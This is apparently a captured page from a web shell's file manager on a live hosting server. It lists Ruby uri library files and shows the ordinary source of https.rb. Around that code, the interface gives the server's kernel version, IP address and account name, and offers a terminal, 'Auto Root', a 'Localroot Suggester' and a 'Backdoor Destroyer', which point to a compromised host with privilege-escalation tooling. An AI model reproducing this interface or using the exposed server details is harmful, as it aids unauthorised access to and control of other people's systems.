Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.217.128
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby33 /
share /
ruby /
uri /
Delete
Unzip
Name
Size
Permission
Date
Action
common.rb
25.34
KB
-rw-r--r--
2026-04-07 17:22
file.rb
2.24
KB
-rw-r--r--
2026-04-07 17:22
ftp.rb
7.03
KB
-rw-r--r--
2026-04-07 17:22
generic.rb
37.42
KB
-rw-r--r--
2026-04-07 17:22
http.rb
3.64
KB
-rw-r--r--
2026-04-07 17:22
https.rb
558
B
-rw-r--r--
2026-04-07 17:22
ldap.rb
5.78
KB
-rw-r--r--
2026-04-07 17:22
ldaps.rb
511
B
-rw-r--r--
2026-04-07 17:22
mailto.rb
7.83
KB
-rw-r--r--
2026-04-07 17:22
rfc2396_parser.rb
17.04
KB
-rw-r--r--
2026-04-07 17:22
rfc3986_parser.rb
4.9
KB
-rw-r--r--
2026-04-07 17:22
version.rb
150
B
-rw-r--r--
2026-04-07 17:22
ws.rb
2.24
KB
-rw-r--r--
2026-04-07 17:22
wss.rb
531
B
-rw-r--r--
2026-04-07 17:22
Save
Rename
# frozen_string_literal: false # = uri/https.rb # # Author:: Akira Yamada <akira@ruby-lang.org> # License:: You can redistribute it and/or modify it under the same term as Ruby. # # See URI for general documentation # require_relative 'http' module URI # The default port for HTTPS URIs is 443, and the scheme is 'https:' rather # than 'http:'. Other than that, HTTPS URIs are identical to HTTP URIs; # see URI::HTTP. class HTTPS < HTTP # A Default port of 443 for URI::HTTPS DEFAULT_PORT = 443 end register_scheme 'HTTPS', HTTPS end